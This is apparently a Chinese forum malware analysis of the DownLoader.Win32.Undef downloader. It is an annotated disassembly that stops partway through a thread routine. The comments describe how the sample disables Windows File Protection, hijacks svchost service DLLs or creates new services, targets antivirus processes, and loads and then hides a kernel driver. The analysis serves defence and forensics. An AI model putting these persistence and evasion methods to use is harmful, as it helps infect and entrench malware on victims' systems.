下载者DownLoader.Win32.Undef分析
DownLoader.Win32.Undef
下载者分析:
分析日期:2010.1.25
- 004018FE http_>/$>push ebp
- 004018FF |.>mov ebp, esp
- 00401901 |.>sub esp, 24
- 00401904 |.>and [local.9], 0
- 00401908 |.>and [local.8], 0
- 0040190C |.>push eax
- 0040190D |.>call 00401912
- 00401912 |$>mov eax, dword ptr [esp]
- 00401915 |.>mov [local.8], eax ; call/pop取当前EIP(00401912)存入local.8,下面用它做VirtualQuery的查询地址,从而得到"当前正在执行的代码属于哪个模块"
- 00401918 |.>pop eax
- 00401919 |.>push 1C ; /n = 1C (28.)
- 0040191B |.>push 0 ; |c = 00
- 0040191D |.>lea eax, [local.7] ; |
- 00401920 |.>push eax ; |s
- 00401921 |.>call <jmp.&MSVCRT.memset> ; /memset 设置缓冲区指定的字符
- 00401926 |.>add esp, 0C
- 00401929 |.>push 1C ; /BufSize = 1C (28.)
- 0040192B |.>lea eax, [local.7] ; |
- 0040192E |.>push eax ; |Buffer
- 0040192F |.>push [local.8] ; |Address
- 00401932 |.>call dword ptr [<&KERNEL32.VirtualQu>; /VirtualQuery
- 00401938 |.>mov eax, [local.6]
- 0040193B |.>mov dword ptr [407574], eax ; [local.6]是MEMORY_BASIC_INFORMATION.AllocationBase,即当前代码所在模块的基址,保存到全局407574(dll中对应3C7574,后面GetModuleFileNameA、释放资源时都用它)
- 00401940 |.>push 0 ; /pModule = NULL
- 00401942 |.>call dword ptr [<&KERNEL32.GetModule>; /GetModuleHandleA 获取模块句柄
- 00401948 |.>cmp eax, dword ptr [407574] 比较GetModuleHandleA(NULL)返回的进程主模块基址与当前代码所在模块的AllocationBase(407574),以此判断自身是以exe还是dll身份运行;3C0000h只是本次调试中dll的加载地址,并非硬编码常量
- 0040194E |.>jnz short 00401966 相等说明自身就是主模块(exe),顺序执行call 1;不相等说明自身是被加载的dll,跳到00401966执行call 2。注意call 1接收4个参数,call 2接收3个参数(从call 2中cmp [arg.2],1的判断看与DllMain的hinstDLL/fdwReason/lpReserved对应),该入口是exe与dll共用的存根
- 00401950 |.>push [arg.4]
- 00401953 |.>push [arg.3]
- 00401956 |.>push [arg.2]
- 00401959 |.>push [arg.1]
- 0040195C |.>call 00401DC4 关键call 1(exe/释放器路径),作用:加载sfc_os.dll并取其序号#5导出函数(用于解除WFP文件保护);遍历18个运行时解密出的候选服务名,劫持其中一个svchost共享服务的ServiceDll(本次分析中观察到的是appmgmts.dll、qmgr.dll),然后启动该服务并ExitProcess;若18个服务都无法劫持,则读取netsvcs列表新建服务。C:\IOSYS.ini配置文件的创建在本段反汇编中并未直接出现(线程1中的call 003C1550会打开它),需在call 0040197E等子调用中确认
- 00401961 |.>mov [local.9], eax
- 00401964 |.>jmp short 00401977
- 00401966 |>>push [arg.3]
- 00401969 |.>push [arg.2]
- 0040196C |.>push [arg.1]
- 0040196F |.>call 00404295 关键call 2,
- 00401974 |.>mov [local.9], eax
- 00401977 |>>mov eax, [local.9]
- 0040197A |.>leave
- 0040197B /.>retn 10
进入关键call 1,代码如下:
- 00401DC4 $>push ebp
- 00401DC5 .>mov ebp, esp
- 00401DC7 .>sub esp, 0C18
- 00401DCD .>and dword ptr [ebp-764], 0
- 00401DD4 .>and dword ptr [ebp-8], 0
- 00401DD8 .>and dword ptr [ebp-124], 0
- 00401DDF .>and dword ptr [ebp-14], 0
- 00401DE3 .>and dword ptr [ebp-654], 0
- 00401DEA .>and dword ptr [ebp-4], 0
- 00401DEE .>and dword ptr [ebp-128], 0
- 00401DF5 .>mov eax, dword ptr [<&USER32.wsprint>
- 00401DFA .>mov dword ptr [ebp-C], eax
- 00401DFD .>call dword ptr [<&USER32.GetInputSta>; [GetInputState
- 00401E03 .>push 0 ; /lParam = 0
- 00401E05 .>push 0 ; |wParam = 0
- 00401E07 .>push 0 ; |Message = WM_NULL
- 00401E09 .>call dword ptr [<&KERNEL32.GetCurren>; |[GetCurrentThreadId
- 00401E0F .>push eax ; |ThreadId
- 00401E10 .>call dword ptr [<&USER32.PostThreadM>; /PostThreadMessageA
- 00401E16 .>push 0 ; /MsgFilterMax = 0
- 00401E18 .>push 0 ; |MsgFilterMin = 0
- 00401E1A .>push 0 ; |hWnd = NULL
- 00401E1C .>lea eax, dword ptr [ebp-24C] ; |
- 00401E22 .>push eax ; |pMsg
- 00401E23 .>call dword ptr [<&USER32.GetMessageA>; /GetMessageA
- 00401E29 .>push 0040757C
- 00401E2E .>push 00407578
- 00401E33 .>push 0
- 00401E35 .>call 0040197E
- 00401E3A .>push 104 ; /BufSize = 104 (260.)
- 00401E3F .>lea eax, dword ptr [ebp-230] ; |
- 00401E45 .>push eax ; |Buffer
- 00401E46 .>call dword ptr [<&KERNEL32.GetWindow>; /GetWindowsDirectoryA
- 00401E4C .>push 104 ; /n = 104 (260.)
- 00401E51 .>push 0 ; |c = 00
- 00401E53 .>lea eax, dword ptr [ebp-120] ; |
- 00401E59 .>push eax ; |s
- 00401E5A .>call <jmp.&MSVCRT.memset> ; /memset
- 00401E5F .>add esp, 0C
- 00401E62 .>lea eax, dword ptr [ebp-120]
- 00401E68 .>push eax ; /Buffer
- 00401E69 .>push 104 ; |BufSize = 104 (260.)
- 00401E6E .>call dword ptr [<&KERNEL32.GetTempPa>; /GetTempPathA
- 00401E74 .>push 0F003F
- 00401E79 .>push 0
- 00401E7B .>push 0
- 00401E7D .>call dword ptr [<&ADVAPI32.OpenSCMan>; advapi32.OpenSCManagerA
- 00401E83 .>mov dword ptr [ebp-4], eax
- 00401E86 .>push 0040536C ; /sfc_os.dll
- 00401E8B .>call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA 加载sfc_os.dll(注意是sfc_os.dll而不是sfc.dll,见上一行压入的字符串);加载失败则直接跳到004020C8走新建服务路径
- 00401E91 .>mov dword ptr [ebp-654], eax
- 00401E97 .>cmp dword ptr [ebp-654], 0
- 00401E9E .>jnz short 00401EAA
- 00401EA0 .>jmp 004020C8
- 00401EA5 .>jmp 004020C8
- 00401EAA >>push 5 ; /ProcNameOrOrdinal = #5
- 00401EAC .>push dword ptr [ebp-654] ; |hModule
- 00401EB2 .>call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress 按序号#5取sfc_os.dll导出函数并存入全局407580;在Windows XP上该序号对应SfcFileException,可临时把单个文件排除在WFP保护之外,后面覆盖系统服务DLL时使用(调用点在本段未显示,推测位于call 00401BBD内)
- 00401EB8 .>mov dword ptr [407580], eax
- 00401EBD .>and dword ptr [ebp-768], 0
- 00401EC4 .>and dword ptr [ebp-B6C], 0
- 00401ECB .>jmp short 00401EDA
- 00401ECD >>mov eax, dword ptr [ebp-B6C]
- 00401ED3 .>inc eax
- 00401ED4 .>mov dword ptr [ebp-B6C], eax
- 00401EDA >>cmp dword ptr [ebp-B6C], 12
- 00401EE1 .>jge 004020C8
- 00401EE7 .>push dword ptr [ebp-B6C]
- 00401EED .>push 0
- 00401EEF .>push 40
- 00401EF1 .>lea eax, dword ptr [ebp-BB0]
- 00401EF7 .>push eax
- 00401EF8 .>call 004017AC //按索引[ebp-B6C](0..17,共18个)解密出第N个候选服务名到[ebp-BB0](64字节)
- 00401EFD .>push dword ptr [ebp-B6C]
- 00401F03 .>push 1
- 00401F05 .>push 40
- 00401F07 .>lea eax, dword ptr [ebp-BF0]
- 00401F0D .>push eax
- 00401F0E .>call 004017AC //解密该服务对应的ServiceDll文件名(不含".dll",后面用"%s\system32\%s%s"拼接时再补上)到[ebp-BF0]
- 00401F13 .>push 0F01FF
- 00401F18 .>lea eax, dword ptr [ebp-BB0]
- 00401F1E .>push eax
- 00401F1F .>push dword ptr [ebp-4]
- 00401F22 .>call dword ptr [<&ADVAPI32.OpenServi>; advapi32.OpenServiceA
- 00401F28 .>mov dword ptr [ebp-128], eax
- 00401F2E .>cmp dword ptr [ebp-128], 0
- 00401F35 .>jnz short 00401F39
- 00401F37 .>jmp short 00401ECD //OpenServiceA失败(服务不存在或无权限)时回到循环头尝试下一个服务名
- 00401F39 >>lea eax, dword ptr [ebp-C0C]
- 00401F3F .>push eax
- 00401F40 .>push dword ptr [ebp-128]
- 00401F46 .>call dword ptr [<&ADVAPI32.QueryServ>; advapi32.QueryServiceStatus 查询该服务状态,[ebp-C08]即SERVICE_STATUS.dwCurrentState。下一行判断其是否为1(SERVICE_STOPPED):已停止则直接跳到00401F8B去替换DLL;否则看[ebp-768]是否为第二轮标志——第一轮只挑已经停止的服务,第二轮才用ControlService(SERVICE_CONTROL_STOP=1)强行停止正在运行的服务。这里遍历的是18个候选服务,并非只针对"AppMgmt"
- 00401F4C .>cmp dword ptr [ebp-C08], 1
- 00401F53 .>je short 00401F8B
- 00401F55 .>cmp dword ptr [ebp-768], 0
- 00401F5C .>jnz short 00401F68
- 00401F5E .>jmp 0040207E //第一轮且服务未停止:放弃该服务,跳到0040207E关闭服务句柄后换下一个
- 00401F63 .>jmp 0040207E
- 00401F68 >>lea eax, dword ptr [ebp-C0C]
- 00401F6E .>push eax
- 00401F6F .>push 1
- 00401F71 .>push dword ptr [ebp-128]
- 00401F77 .>call dword ptr [<&ADVAPI32.ControlSe>; advapi32.ControlService
- 00401F7D .>test eax, eax
- 00401F7F .>jnz short 00401F8B
- 00401F81 .>jmp 0040207E
- 00401F86 .>jmp 0040207E
- 00401F8B >>push 104 ; /n = 104 (260.)
- 00401F90 .>push 0 ; |c = 00
- 00401F92 .>lea eax, dword ptr [ebp-760] ; |
- 00401F98 .>push eax ; |s
- 00401F99 .>call <jmp.&MSVCRT.memset> ; /memset
- 00401F9E .>add esp, 0C
- 00401FA1 .>cmp dword ptr [ebp-764], 0
- 00401FA8 .>jnz short 00401FD4
- 00401FAA .>push 00405378 ; /.dll
- 00401FAF .>lea eax, dword ptr [ebp-BF0] ; |
- 00401FB5 .>push eax ; |<%s>
- 00401FB6 .>lea eax, dword ptr [ebp-230] ; |
- 00401FBC .>push eax ; |<%s>
- 00401FBD .>push 00405380 ; |%s/system32/%s%s
- 00401FC2 .>lea eax, dword ptr [ebp-760] ; |
- 00401FC8 .>push eax ; |s
- 00401FC9 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 拼出目标服务DLL的完整路径,如C:\WINDOWS\system32\appmgmts.dll(本文中的"/"是论坛转义,实际路径分隔符是反斜杠)。[ebp-764]在函数入口被清零且本段内从未置1,所以下面"%TEMP%\<随机数>.dll"的分支在此反汇编中不会走到
- 00401FCF .>add esp, 14
- 00401FD2 .>jmp short 00402009
- 00401FD4 >>call 0040176E
- 00401FD9 .>push eax ; /<%d>
- 00401FDA .>lea eax, dword ptr [ebp-120] ; |
- 00401FE0 .>push eax ; |<%s>
- 00401FE1 .>push 00405394 ; |%s%d.dll
- 00401FE6 .>lea eax, dword ptr [ebp-760] ; |
- 00401FEC .>push eax ; |s
- 00401FED .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 拼出%TEMP%\<随机数>.dll路径(见上注,本段中该分支不可达);随后call 00401B0C以服务名和该路径为参数,推测是改写服务的ServiceDll注册项,需进入确认
- 00401FF3 .>add esp, 10
- 00401FF6 .>lea eax, dword ptr [ebp-760]
- 00401FFC .>push eax
- 00401FFD .>lea eax, dword ptr [ebp-BB0]
- 00402003 .>push eax
- 00402004 .>call 00401B0C
- 00402009 >>lea eax, dword ptr [ebp-760]
- 0040200F .>push eax
- 00402010 .>call 00401BBD ; 以目标DLL路径为参数,返回非零才会继续启动服务。从上下文(已取得sfc_os #5导出函数、服务已处于停止状态)推测其内部是解除WFP保护并用病毒DLL覆盖该文件,而不只是检查文件是否存在——需进入确认
- 00402015 .>test eax, eax
- 00402017 .>jnz short 0040201D 返回非零(替换成功)则启动服务;返回零则跳到0040207E,关闭句柄并尝试下一个服务
- 00402019 .>jmp short 0040207E 替换失败时走这里
- 0040201B .>jmp short 0040207E
- 0040201D >>push 0
- 0040201F .>push 0
- 00402021 .>push dword ptr [ebp-128]
- 00402027 .>call dword ptr [<&ADVAPI32.StartServ>; advapi32.StartServiceA 启动被劫持的服务,使svchost.exe加载已被替换的服务DLL。启动成功后释放sfc_os.dll、关闭SCM句柄并ExitProcess(0)(00402035-00402078)——释放器自身退出,后续恶意代码在承载该服务的svchost进程里、以该服务宿主的权限(netsvcs组通常为LocalSystem)继续运行
- 0040202D .>test eax, eax
- 0040202F .>jnz short 00402035 ;
- 00402031 .>jmp short 0040207E
- 00402033 .>jmp short 0040207E
- 00402035 >>push dword ptr [ebp-654] ; /hLibModule
- 0040203B .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 00402041 .>push dword ptr [ebp-128]
- 00402047 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 0040204D .>push dword ptr [ebp-4]
- 00402050 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 00402056 .>cmp dword ptr [407578], 0
- 0040205D .>je short 00402076
- 0040205F .>mov eax, dword ptr [407578]
- 00402064 .>mov dword ptr [ebp-C10], eax
- 0040206A .>push dword ptr [ebp-C10]
- 00402070 .>call <jmp.&MSVCRT.operator delete>
- 00402075 .>pop ecx
- 00402076 >>push 0 ; /ExitCode = 0
- 00402078 .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
- 0040207E >>cmp dword ptr [ebp-764], 1
- 00402085 .>jnz short 00402094
- 00402087 .>lea eax, dword ptr [ebp-760]
- 0040208D .>push eax ; /FileName
- 0040208E .>call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
- 00402094 >>push dword ptr [ebp-128]
- 0040209A .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 004020A0 .>cmp dword ptr [ebp-B6C], 11
- 004020A7 .>jnz short 004020C3
- 004020A9 .>cmp dword ptr [ebp-768], 0
- 004020B0 .>jnz short 004020C3
- 004020B2 .>mov dword ptr [ebp-768], 1
- 004020BC .>or dword ptr [ebp-B6C], FFFFFFFF
- 004020C3 >>jmp 00401ECD //回到循环头取下一个服务名。上面004020A0-004020BC:第一轮([ebp-768]=0)走完全部18个仍未成功时,把标志置1并把索引置为-1,从头开始第二轮,第二轮允许强制停止正在运行的服务。两轮都失败则落到004020C8走新建服务路径
- 004020C8 >>lea eax, dword ptr [ebp-10]
- 004020CB .>push eax ; /pHandle
- 004020CC .>push 1 ; |Access = KEY_QUERY_VALUE
- 004020CE .>push 0 ; |Reserved = 0
- 004020D0 .>push 004053A0 ; |SOFTWARE/Microsoft/Windows NT/CurrentVersion/Svchost
- 004020D5 .>push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
- 004020DA .>call dword ptr [<&ADVAPI32.RegOpenKe>; /RegOpenKeyExA
- 004020E0 .>push 400 ; /n = 400 (1024.)
- 004020E5 .>push 0 ; |c = 00
- 004020E7 .>lea eax, dword ptr [ebp-B68] ; |
- 004020ED .>push eax ; |s
- 004020EE .>call <jmp.&MSVCRT.memset> ; /memset
- 004020F3 .>add esp, 0C
- 004020F6 .>mov dword ptr [ebp-14], 400
- 004020FD .>lea eax, dword ptr [ebp-14]
- 00402100 .>push eax ; /pBufSize
- 00402101 .>lea eax, dword ptr [ebp-B68] ; |
- 00402107 .>push eax ; |Buffer
- 00402108 .>lea eax, dword ptr [ebp-124] ; |
- 0040210E .>push eax ; |pValueType
- 0040210F .>push 0 ; |Reserved = NULL
- 00402111 .>push 004053D8 ; |netsvcsvcs%SystemRoot%/System32/svchost.exe -k nets
- 00402116 .>push dword ptr [ebp-10] ; |hKey
- 00402119 .>call dword ptr [<&ADVAPI32.RegQueryV>; /RegQueryValueExA 读取HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost下的"netsvcs"值(REG_MULTI_SZ,值名被OllyDbg与相邻字符串连显成"netsvcsvcs...")。随后00402131起逐个遍历其中的服务名:对每个名字以"%SystemRoot%\System32\svchost.exe -k nets"+"vcs"两段拼出映像路径(字符串被拆成两段,可能是为了躲避对"-k netsvcs"的静态扫描),创建SERVICE_WIN32_SHARE_PROCESS|SERVICE_AUTO_START的同名服务,释放system32\<名>.dll并启动,成功即ExitProcess——这是劫持现有服务失败时的后备持久化手段
- 0040211F .>push dword ptr [ebp-10] ; /hKey
- 00402122 .>call dword ptr [<&ADVAPI32.RegCloseK>; /RegCloseKey
- 00402128 .>lea eax, dword ptr [ebp-B68]
- 0040212E .>mov dword ptr [ebp-8], eax
- 00402131 >>mov eax, dword ptr [ebp-8]
- 00402134 .>movsx eax, byte ptr [eax]
- 00402137 .>test eax, eax
- 00402139 .>je 004022AF
- 0040213F .>push 400 ; /n = 400 (1024.)
- 00402144 .>push 0 ; |c = 00
- 00402146 .>lea eax, dword ptr [ebp-650] ; |
- 0040214C .>push eax ; |s
- 0040214D .>call <jmp.&MSVCRT.memset> ; /memset
- 00402152 .>add esp, 0C
- 00402155 .>push 004053E0 ; vcs%SystemRoot%/System32/svchost.exe -k nets
- 0040215A .>push 004053E4 ; %SystemRoot%/System32/svchost.exe -k nets
- 0040215F .>push 00405410 ; %s%s
- 00402164 .>lea eax, dword ptr [ebp-650]
- 0040216A .>push eax
- 0040216B .>call dword ptr [ebp-C]
- 0040216E .>add esp, 10
- 00402171 .>push 0 ; /Password = NULL
- 00402173 .>push 0 ; |ServiceStartName = NULL
- 00402175 .>push 0 ; |pDependencies = NULL
- 00402177 .>push 0 ; |pTagId = NULL
- 00402179 .>push 0 ; |LoadOrderGroup = NULL
- 0040217B .>lea eax, dword ptr [ebp-650] ; |
- 00402181 .>push eax ; |BinaryPathName
- 00402182 .>push 1 ; |ErrorControl = SERVICE_ERROR_NORMAL
- 00402184 .>push 2 ; |StartType = SERVICE_AUTO_START
- 00402186 .>push 20 ; |ServiceType = SERVICE_WIN32_SHARE_PROCESS
- 00402188 .>push 10 ; |DesiredAccess = SERVICE_START
- 0040218A .>push dword ptr [ebp-8] ; |DisplayName
- 0040218D .>push dword ptr [ebp-8] ; |ServiceName
- 00402190 .>push dword ptr [ebp-4] ; |hManager
- 00402193 .>call dword ptr [<&ADVAPI32.CreateSer>; /CreateServiceA
- 00402199 .>mov dword ptr [ebp-128], eax
- 0040219F .>cmp dword ptr [ebp-128], 0
- 004021A6 .>je 00402281
- 004021AC .>cmp dword ptr [ebp-764], 0
- 004021B3 .>jnz short 004021DB
- 004021B5 .>push 00405378 ; /.dll
- 004021BA .>push dword ptr [ebp-8] ; |<%s>
- 004021BD .>lea eax, dword ptr [ebp-230] ; |
- 004021C3 .>push eax ; |<%s>
- 004021C4 .>push 00405380 ; |%s/system32/%s%s
- 004021C9 .>lea eax, dword ptr [ebp-760] ; |
- 004021CF .>push eax ; |s
- 004021D0 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 004021D6 .>add esp, 14
- 004021D9 .>jmp short 004021FD
- 004021DB >>call 0040176E
- 004021E0 .>push eax ; /<%d>
- 004021E1 .>lea eax, dword ptr [ebp-120] ; |
- 004021E7 .>push eax ; |<%s>
- 004021E8 .>push 00405394 ; |%s%d.dll
- 004021ED .>lea eax, dword ptr [ebp-760] ; |
- 004021F3 .>push eax ; |s
- 004021F4 .>call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 004021FA .>add esp, 10
- 004021FD >>lea eax, dword ptr [ebp-760]
- 00402203 .>push eax
- 00402204 .>push dword ptr [ebp-8]
- 00402207 .>call 00401B0C
- 0040220C .>lea eax, dword ptr [ebp-760]
- 00402212 .>push eax
- 00402213 .>call 00401BBD
- 00402218 .>test eax, eax
- 0040221A .>jnz short 00402220
- 0040221C .>jmp short 00402281
- 0040221E .>jmp short 00402281
- 00402220 >>push 0
- 00402222 .>push 0
- 00402224 .>push dword ptr [ebp-128]
- 0040222A .>call dword ptr [<&ADVAPI32.StartServ>; advapi32.StartServiceA
- 00402230 .>test eax, eax
- 00402232 .>jnz short 00402238
- 00402234 .>jmp short 00402281
- 00402236 .>jmp short 00402281
- 00402238 >>push dword ptr [ebp-654] ; /hLibModule
- 0040223E .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 00402244 .>push dword ptr [ebp-128]
- 0040224A .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 00402250 .>push dword ptr [ebp-4]
- 00402253 .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 00402259 .>cmp dword ptr [407578], 0
- 00402260 .>je short 00402279
- 00402262 .>mov eax, dword ptr [407578]
- 00402267 .>mov dword ptr [ebp-C14], eax
- 0040226D .>push dword ptr [ebp-C14]
- 00402273 .>call <jmp.&MSVCRT.operator delete>
- 00402278 .>pop ecx
- 00402279 >>push 0 ; /ExitCode = 0
- 0040227B .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
- 00402281 >>cmp dword ptr [ebp-764], 1
- 00402288 .>jnz short 00402297
- 0040228A .>lea eax, dword ptr [ebp-760]
- 00402290 .>push eax ; /FileName
- 00402291 .>call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
- 00402297 >>push dword ptr [ebp-8] ; /String
- 0040229A .>call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 004022A0 .>mov ecx, dword ptr [ebp-8]
- 004022A3 .>lea eax, dword ptr [ecx+eax+1]
- 004022A7 .>mov dword ptr [ebp-8], eax
- 004022AA .>jmp 00402131
- 004022AF >>push dword ptr [ebp-654] ; /hLibModule
- 004022B5 .>call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 004022BB .>push dword ptr [ebp-4]
- 004022BE .>call dword ptr [<&ADVAPI32.CloseServ>; advapi32.CloseServiceHandle
- 004022C4 .>cmp dword ptr [407578], 0
- 004022CB .>je short 004022E4
- 004022CD .>mov eax, dword ptr [407578]
- 004022D2 .>mov dword ptr [ebp-C18], eax
- 004022D8 .>push dword ptr [ebp-C18]
- 004022DE .>call <jmp.&MSVCRT.operator delete>
- 004022E3 .>pop ecx
- 004022E4 >>push 0 ; /ExitCode = 0
- 004022E6 .>call dword ptr [<&KERNEL32.ExitProce>; /ExitProcess
- 004022EC .>leave
- 004022ED .>retn 10
进入关键call 2,代码如下:
- 003C4295 /$ 5>push ebp
- 003C4296 |. 8>mov ebp, esp
- 003C4298 |. 8>cmp [arg.2], 1
- 003C429C |. 7>jnz short 003C42B3
- 003C429E |. 6>push 0 ; /pThreadId = NULL
- 003C42A0 |. 6>push 0 ; |CreationFlags = 0
- 003C42A2 |. 6>push 0 ; |pThreadParm = NULL
- 003C42A4 |. 6>push 003C43D1 ; |ThreadFunction = appmgmts.003C43D1
- 003C42A9 |. 6>push 0 ; |StackSize = 0
- 003C42AB |. 6>push 0 ; |pSecurity = NULL
- 003C42AD |. F>call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 仅在[arg.2]==1(即DllMain的fdwReason==DLL_PROCESS_ATTACH)时创建线程1运行003C43D1,之后固定返回1(TRUE);其它fdwReason直接返回TRUE。可见关键call 2实际就是dll的DllMain逻辑,病毒dll被svchost加载的瞬间即启动线程1
- 003C42B3 |> 3>xor eax, eax
- 003C42B5 |. 4>inc eax
- 003C42B6 |. 5>pop ebp
- 003C42B7 /. C>retn 0C
进入线程 1,代码如下:
- 003C43D1 >push ebp
- 003C43D2 >mov ebp, esp
- 003C43D4 >mov eax, 1DA0
- 003C43D9 >call 003C4920
- 003C43DE >and dword ptr [ebp-18], 0
- 003C43E2 >and dword ptr [ebp-8], 0
- 003C43E6 >and dword ptr [ebp-14], 0
- 003C43EA >and dword ptr [ebp-1C], 0
- 003C43EE >and dword ptr [ebp-20], 0
- 003C43F2 >or dword ptr [ebp-10], FFFFFFFF
- 003C43F6 >and dword ptr [ebp-4], 0
- 003C43FA >mov eax, dword ptr [<&USER32.wsprint>
- 003C43FF >mov dword ptr [ebp-C], eax
- 003C4402 >mov eax, dword ptr [<&SHLWAPI.SHDele>
- 003C4407 >mov dword ptr [ebp-930], eax
- 003C440D >mov eax, dword ptr [<&KERNEL32.Sleep>
- 003C4412 >mov dword ptr [ebp-92C], eax
- 003C4418 >push 0
- 003C441A >call 003C1550 推测为打开/读取配置文件C:\IOSYS.ini(函数内部未在此展示),返回值存入全局3C7588
- 003C441F >mov dword ptr [3C7588], eax
- 003C4424 >push 003C564C ; ASCII "avp.exe"
- 003C4429 >call 003C1000 按进程名查找进程(推测为遍历进程列表),目标是卡巴斯基的avp.exe;存在则跳去call 003C133B
- 003C442E >test eax, eax
- 003C4430 >jnz short 003C4440
- 003C4432 >push 003C5654 ; ASCII "bdagent.exe"
- 003C4437 >call 003C1000 再查BitDefender的bdagent.exe;avp.exe或bdagent.exe任一存在即调用003C133B(该函数内容未展示,从上下文推测是针对这两款杀软的对抗处理,是否真的"关闭"进程需进入确认)
- 003C443C >test eax, eax
- 003C443E >je short 003C4445
- 003C4440 >call 003C133B
- 003C4445 >push 0
- 003C4447 >push dword ptr [3C600C]
- 003C444D >push 800
- 003C4452 >push 003C6350
- 003C4457 >call 003C1680 就地解密003C6350处长度0x800的字符串表(密钥取自3C600C),表中为以NUL分隔的杀软进程名列表,如KVMonXP.kxp;该表随后在003C47C8的循环中逐项用于IFEO镜像劫持
- 003C445C >push 104 ; /n = 104 (260.)
- 003C4461 >push 0 ; |c = 00
- 003C4463 >push 003C7368 ; |s = appmgmts.003C7368
- 003C4468 >call <jmp.&MSVCRT.memset> ; /memset
- 003C446D >add esp, 0C
- 003C4470 >push 003C7368 ; /Buffer = appmgmts.003C7368
- 003C4475 >push 104 ; |BufSize = 104 (260.)
- 003C447A >call dword ptr [<&KERNEL32.GetTempPa>; /GetTempPathA
- 003C4480 >push 104 ; /n = 104 (260.)
- 003C4485 >push 0 ; |c = 00
- 003C4487 >push 003C7470 ; |s = appmgmts.003C7470
- 003C448C >call <jmp.&MSVCRT.memset> ; /memset
- 003C4491 >add esp, 0C
- 003C4494 >push 104 ; /BufSize = 104 (260.)
- 003C4499 >push 003C7470 ; |Buffer = appmgmts.003C7470
- 003C449E >call dword ptr [<&KERNEL32.GetSystem>; /GetSystemDirectoryA
- 003C44A4 >push 104 ; /n = 104 (260.)
- 003C44A9 >push 0 ; |c = 00
- 003C44AB >lea eax, dword ptr [ebp-B40] ; |
- 003C44B1 >push eax ; |s
- 003C44B2 >call <jmp.&MSVCRT.memset> ; /memset
- 003C44B7 >add esp, 0C
- 003C44BA >push 003C5660 ; ASCII "Accopt.sys"
- 003C44BF >push 003C7368
- 003C44C4 >push 003C5410 ; ASCII "%s%s"
- 003C44C9 >lea eax, dword ptr [ebp-B40]
- 003C44CF >push eax
- 003C44D0 >call dword ptr [ebp-C] wsprintfA,拼出%TEMP%\Accopt.sys
- 003C44D3 >add esp, 10
- 003C44D6 >push 80
- 003C44DB >push 65
- 003C44DD >push dword ptr [3C7574] ; appmgmts.003C0000
- 003C44E3 >lea eax, dword ptr [ebp-B40]
- 003C44E9 >push eax
- 003C44EA >call 003C13FE 以(路径,自身模块句柄,0x65,0x80)为参数,推测是从自身资源(ID 0x65)中释放驱动文件到%TEMP%\Accopt.sys——需进入确认
- 003C44EF >lea eax, dword ptr [ebp-B40]
- 003C44F5 >push eax
- 003C44F6 >call 003C4361 以该.sys路径创建并启动名为Accopt的驱动服务(推测)。紧接着SHDeleteKey删除HKLM\SYSTEM\CurrentControlSet\Services\Accopt,DeleteFileA删除Accopt.sys——驱动加载后立即抹掉服务项和文件,只驻留于内存,增加取证和清除难度
- 003C44FB >push 400 ; /n = 400 (1024.)
- 003C4500 >push 0 ; |c = 00
- 003C4502 >lea eax, dword ptr [ebp-F40] ; |
- 003C4508 >push eax ; |s
- 003C4509 >call <jmp.&MSVCRT.memset> ; /memset
- 003C450E >add esp, 0C
- 003C4511 >push 003C5644 ; /<%s> = "Accopt"
- 003C4516 >push dword ptr [3C6004] ; |<%s> = "SYSTEM/CurrentControlSet/Services"
- 003C451C >push 003C534C ; |Format = "%s/%s"
- 003C4521 >lea eax, dword ptr [ebp-F40] ; |
- 003C4527 >push eax ; |s
- 003C4528 >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 003C452E >add esp, 10
- 003C4531 >lea eax, dword ptr [ebp-F40]
- 003C4537 >push eax
- 003C4538 >push 80000002
- 003C453D >call dword ptr [ebp-930] SHDeleteKey 删除刚创建的驱动服务注册项(见上注)
- 003C4543 >lea eax, dword ptr [ebp-B40]
- 003C4549 >push eax ; /FileName
- 003C454A >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA 删除驱动文件Accopt.sys;此时驱动已在内核中,磁盘和注册表上都不再有痕迹,取证时需从内存/已加载模块列表中找Accopt,并在下面CreateFileA打开的设备名\\.\Accopt上设检测
- 003C4550 >push 104 ; /BufSize = 104 (260.)
- 003C4555 >lea eax, dword ptr [ebp-A38] ; |
- 003C455B >push eax ; |PathBuffer
- 003C455C >push dword ptr [3C7574] ; |hModule = 003C0000 (appmgmts)
- 003C4562 >call dword ptr [<&KERNEL32.GetModule>; /GetModuleFileNameA
- 003C4568 >push 5C ; /c = 5C ('/')
- 003C456A >lea eax, dword ptr [ebp-A38] ; |
- 003C4570 >push eax ; |s
- 003C4571 >call dword ptr [<&MSVCRT.strrchr>] ; /strrchr
- 003C4577 >pop ecx
- 003C4578 >pop ecx
- 003C4579 >inc eax
- 003C457A >push eax ; /String2
- 003C457B >lea eax, dword ptr [ebp-928] ; |
- 003C4581 >push eax ; |String1
- 003C4582 >call dword ptr [<&KERNEL32.lstrcpyA>>; /lstrcpyA
- 003C4588 >push 2E ; /c = 2E ('.')
- 003C458A >lea eax, dword ptr [ebp-928] ; |
- 003C4590 >push eax ; |s
- 003C4591 >call dword ptr [<&MSVCRT.strrchr>] ; /strrchr
- 003C4597 >pop ecx
